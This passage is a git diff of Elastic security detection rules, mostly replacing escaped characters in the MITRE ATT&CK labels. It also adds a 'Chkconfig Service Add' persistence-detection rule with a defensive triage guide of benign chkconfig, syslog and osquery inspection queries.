- "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/b81bd314-db5b-4d97-82e8-88e3e5fc9de5_1.json b/packages/security_detection_engine/kibana/security_rule/b81bd314-db5b-4d97-82e8-88e3e5fc9de5_1.json index 8074936b3f7..1bfc4b5b8b5 100644 --- a/packages/security_detection_engine/kibana/security_rule/b81bd314-db5b-4d97-82e8-88e3e5fc9de5_1.json +++ b/packages/security_detection_engine/kibana/security_rule/b81bd314-db5b-4d97-82e8-88e3e5fc9de5_1.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/b81bd314-db5b-4d97-82e8-88e3e5fc9de5_2.json b/packages/security_detection_engine/kibana/security_rule/b81bd314-db5b-4d97-82e8-88e3e5fc9de5_2.json index 1dcf2d2702e..a94de9b22a4 100644 --- a/packages/security_detection_engine/kibana/security_rule/b81bd314-db5b-4d97-82e8-88e3e5fc9de5_2.json +++ b/packages/security_detection_engine/kibana/security_rule/b81bd314-db5b-4d97-82e8-88e3e5fc9de5_2.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/b8386923-b02c-4b94-986a-d223d9b01f88_2.json b/packages/security_detection_engine/kibana/security_rule/b8386923-b02c-4b94-986a-d223d9b01f88_2.json index 4f38c5eb9d9..35cf5481137 100644 --- a/packages/security_detection_engine/kibana/security_rule/b8386923-b02c-4b94-986a-d223d9b01f88_2.json +++ b/packages/security_detection_engine/kibana/security_rule/b8386923-b02c-4b94-986a-d223d9b01f88_2.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/b8386923-b02c-4b94-986a-d223d9b01f88_3.json b/packages/security_detection_engine/kibana/security_rule/b8386923-b02c-4b94-986a-d223d9b01f88_3.json index 353bf0a6765..e1005c97fb0 100644 --- a/packages/security_detection_engine/kibana/security_rule/b8386923-b02c-4b94-986a-d223d9b01f88_3.json +++ b/packages/security_detection_engine/kibana/security_rule/b8386923-b02c-4b94-986a-d223d9b01f88_3.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/b8386923-b02c-4b94-986a-d223d9b01f88_4.json b/packages/security_detection_engine/kibana/security_rule/b8386923-b02c-4b94-986a-d223d9b01f88_4.json index d5f03e41ce2..93b12938bcb 100644 --- a/packages/security_detection_engine/kibana/security_rule/b8386923-b02c-4b94-986a-d223d9b01f88_4.json +++ b/packages/security_detection_engine/kibana/security_rule/b8386923-b02c-4b94-986a-d223d9b01f88_4.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -107,7 +107,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_103.json b/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_103.json index 5200b1d6a5f..d2255fe3dac 100644 --- a/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_103.json +++ b/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_103.json @@ -49,7 +49,7 @@ ], "risk_score": 73, "rule_id": "b83a7e96-2eb3-4edf-8346-427b6858d3bd", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_104.json b/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_104.json index 84c3f7627ba..995bc9311bf 100644 --- a/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_104.json +++ b/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_104.json @@ -49,7 +49,7 @@ ], "risk_score": 73, "rule_id": "b83a7e96-2eb3-4edf-8346-427b6858d3bd", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_105.json b/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_105.json index 04d692d29d9..626ed0ab869 100644 --- a/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_105.json +++ b/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_105.json @@ -49,7 +49,7 @@ ], "risk_score": 73, "rule_id": "b83a7e96-2eb3-4edf-8346-427b6858d3bd", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_106.json b/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_106.json index 7b44f7cc23b..46d4743f74a 100644 --- a/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_106.json +++ b/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_106.json @@ -49,7 +49,7 @@ ], "risk_score": 73, "rule_id": "b83a7e96-2eb3-4edf-8346-427b6858d3bd", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/b86afe07-0d98-4738-b15d-8d7465f95ff5_102.json b/packages/security_detection_engine/kibana/security_rule/b86afe07-0d98-4738-b15d-8d7465f95ff5_102.json index 8820d7b8eba..b6c7d983419 100644 --- a/packages/security_detection_engine/kibana/security_rule/b86afe07-0d98-4738-b15d-8d7465f95ff5_102.json +++ b/packages/security_detection_engine/kibana/security_rule/b86afe07-0d98-4738-b15d-8d7465f95ff5_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b86afe07-0d98-4738-b15d-8d7465f95ff5_103.json b/packages/security_detection_engine/kibana/security_rule/b86afe07-0d98-4738-b15d-8d7465f95ff5_103.json index d834aef2e1e..10def0bac05 100644 --- a/packages/security_detection_engine/kibana/security_rule/b86afe07-0d98-4738-b15d-8d7465f95ff5_103.json +++ b/packages/security_detection_engine/kibana/security_rule/b86afe07-0d98-4738-b15d-8d7465f95ff5_103.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b86afe07-0d98-4738-b15d-8d7465f95ff5_104.json b/packages/security_detection_engine/kibana/security_rule/b86afe07-0d98-4738-b15d-8d7465f95ff5_104.json index 594e1d21d13..0c2ffeef589 100644 --- a/packages/security_detection_engine/kibana/security_rule/b86afe07-0d98-4738-b15d-8d7465f95ff5_104.json +++ b/packages/security_detection_engine/kibana/security_rule/b86afe07-0d98-4738-b15d-8d7465f95ff5_104.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b8f8da2d-a9dc-48c0-90e4-955c0aa1259a_1.json b/packages/security_detection_engine/kibana/security_rule/b8f8da2d-a9dc-48c0-90e4-955c0aa1259a_1.json index 24c553a5d41..69a62a258dd 100644 --- a/packages/security_detection_engine/kibana/security_rule/b8f8da2d-a9dc-48c0-90e4-955c0aa1259a_1.json +++ b/packages/security_detection_engine/kibana/security_rule/b8f8da2d-a9dc-48c0-90e4-955c0aa1259a_1.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -70,7 +70,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/b8f8da2d-a9dc-48c0-90e4-955c0aa1259a_2.json b/packages/security_detection_engine/kibana/security_rule/b8f8da2d-a9dc-48c0-90e4-955c0aa1259a_2.json index f80531c5c11..d2b0dbd0c68 100644 --- a/packages/security_detection_engine/kibana/security_rule/b8f8da2d-a9dc-48c0-90e4-955c0aa1259a_2.json +++ b/packages/security_detection_engine/kibana/security_rule/b8f8da2d-a9dc-48c0-90e4-955c0aa1259a_2.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_103.json b/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_103.json index 657ac999b2c..40d6e06ecad 100644 --- a/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_103.json +++ b/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_103.json @@ -63,7 +63,7 @@ ], "risk_score": 73, "rule_id": "b90cdde7-7e0d-4359-8bf0-2c112ce2008a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_104.json b/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_104.json index 0ebc016a0bd..3b9b8e1fc8e 100644 --- a/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_104.json +++ b/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_104.json @@ -63,7 +63,7 @@ ], "risk_score": 73, "rule_id": "b90cdde7-7e0d-4359-8bf0-2c112ce2008a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_105.json b/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_105.json index 176f2e719dd..f533f74a6b1 100644 --- a/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_105.json +++ b/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_105.json @@ -63,7 +63,7 @@ ], "risk_score": 73, "rule_id": "b90cdde7-7e0d-4359-8bf0-2c112ce2008a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_106.json b/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_106.json index 3156b78ab29..9f267f05c0b 100644 --- a/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_106.json +++ b/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_106.json @@ -63,7 +63,7 @@ ], "risk_score": 73, "rule_id": "b90cdde7-7e0d-4359-8bf0-2c112ce2008a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -99,7 +99,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -121,7 +121,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_107.json b/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_107.json index f19ee0f6461..473ad0c512b 100644 --- a/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_107.json +++ b/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_107.json @@ -62,7 +62,7 @@ ], "risk_score": 73, "rule_id": "b90cdde7-7e0d-4359-8bf0-2c112ce2008a", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -120,7 +120,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_103.json b/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_103.json index b7790e577fc..2887e10a000 100644 --- a/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_103.json +++ b/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_103.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_104.json b/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_104.json index 7d2996a63ef..d0c4bfc7754 100644 --- a/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_104.json +++ b/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_104.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_105.json b/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_105.json index 770d9985167..31611fda86e 100644 --- a/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_105.json +++ b/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_105.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_106.json b/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_106.json index aa070217ad7..995a37b252c 100644 --- a/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_106.json +++ b/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_106.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_107.json b/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_107.json index 317ff7458e9..e105f532bf5 100644 --- a/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_107.json +++ b/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_107.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_108.json b/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_108.json index 10e11af9c4b..4adb59ebdd2 100644 --- a/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_108.json +++ b/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_108.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_109.json b/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_109.json new file mode 100644 index 00000000000..416257a5151 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_109.json @@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the use of the chkconfig binary to manually add a service for management by chkconfig. Threat actors may utilize this technique to maintain persistence on a system. When a new service is added, chkconfig ensures that the service has either a start or a kill entry in every runlevel and when the system is rebooted the service file added will run providing long-term persistence.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Chkconfig Service Add", + "note": "## Triage and analysis\n\n### Investigating Chkconfig Service Add\nService files are configuration files in Linux systems used to define and manage system services. The `Chkconfig` binary can be used to manually add, delete or modify a service. \n\nMalicious actors can leverage services to achieve persistence by creating or modifying service files to execute malicious commands or payloads during system startup. This allows them to maintain unauthorized access, execute additional malicious activities, or evade detection.\n\nThis rule monitors the usage of the `chkconfig` binary to manually add a service for management by `chkconfig`, potentially indicating the creation of a persistence mechanism.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the service that was created or modified.\n- Investigate the currently enabled system services through the following commands `sudo chkconfig --list | grep on` and `sudo systemctl list-unit-files`.\n- Investigate the status of potentially suspicious services through the `chkconfig --list service_name` command. \n- Search for the `rc.d` or `init.d` service files that were created or modified, and analyze their contents.\n- Investigate whether any other files in any of the available `rc.d` or `init.d` directories have been altered through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/init.d/%' OR path LIKE '/etc/rc%.d/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/init.d/%' OR path LIKE '/etc/rc%.d/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate syslog through the `sudo cat /var/log/syslog | grep 'LSB'` command to find traces of the LSB header of the script (if present). If syslog is being ingested into Elasticsearch, the same can be accomplished through Kibana.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n- Investigate abnormal behaviors by the subject process/user such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential command and control traffic or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses the `chkconfig` binary for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Suspicious File Creation in /etc for Persistence - 1c84dd64-7e6c-4bad-ac73-a5014ee37042\n- Potential Persistence Through Run Control Detected - 0f4d35e4-925e-4959-ab24-911be207ee6f\n- Potential Persistence Through init.d Detected - 474fd20e-14cc-49c5-8160-d9ab4ba16c8b\n- New Systemd Timer Created - 